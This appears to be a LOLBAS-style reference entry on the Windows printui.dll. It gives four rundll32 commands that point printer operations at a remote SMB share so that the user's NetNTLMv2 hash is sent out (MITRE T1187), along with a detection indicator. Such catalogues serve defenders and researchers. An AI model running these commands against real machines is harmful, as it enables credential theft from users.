LOLBin: printui.dll

Printer Settings User Interface is an executable file that contains functions used by the printer configuration dialog boxes. Functionality includes listing printer properties, adding new printers, installing printer via inf file, storing printer settings into a file and loading printer settings from file.

The Printer Settings User Interface (printui.dll) is a Living Off The Land Binary (LOLBin) that can be used by attackers to steal credentials. Attackers can attempt to list network printer properties, install printer with inf file located on an attacker controlled share or backup and restore settings from a file stored on an attacker controlled share. Windows will automatically attempt to authenticate using the current user's account credentials.

---
Name: printui.dll
Description: Printer Settings User Interface
Author: Benjamin Lim
Created: 6 Sep 2021
Commands:
  - Command: rundll32.exe printui.dll,PrintUIEntry /s /t1 /c\\1.2.3.4\printer
    Description: Run printer properties for a network printer.
    Usecase: A SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process.
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
  - Command: rundll32.exe printui.dll, PrintUIEntry /ia /m "Brother DCP-128C" /K /h x64 /v 3 /f "\\1.2.3.4\printer1"
    Description: Run inf install for printer1 with inf file located on a remote share.
    Usecase: A SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process.
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
  - Command: rundll32.exe printui.dll,PrintUIEntry /ia /c\\1.2.3.4\printer2 /m "Brother DCP-128C" /h "x86" /v "Type 3 - User Mode" /f c:\infpath\infFile.inf
    Description: Add printer driver for printer2 using inf file located on a remote share.
    Usecase: A SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process.
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10
  - Command: rundll32.exe printui.dll,PrintUIEntry /Ss /n "Fax" /a "\\1.2.3.4\printer3"
    Description: Store printer settings for printer named "Fax" onto a remote share.
    Usecase: A SMB connection will be created to the remote location, causing NetNTLMv2 challenge hash to be sent in the process. Prerequisites: System must have a printer named "Fax".
    Category: Credentials
    Privileges: User
    MitreID: T1187
    MitreLink: https://attack.mitre.org/techniques/T1187/
    OperatingSystem: Windows 8, Windows 8.1, Windows 10    
Full_Path:
  - Path: c:\windows\system32\printui.dll
Detection: 
  - IOC: SMB traffic from PID 4 to Internet destination 
Resources:
  - Link: https://limbenjamin.com/articles/lolbin-printui.html
Acknowledgement:
  - Person: Benjamin Lim
    Handle: @limbenjamincom
---

image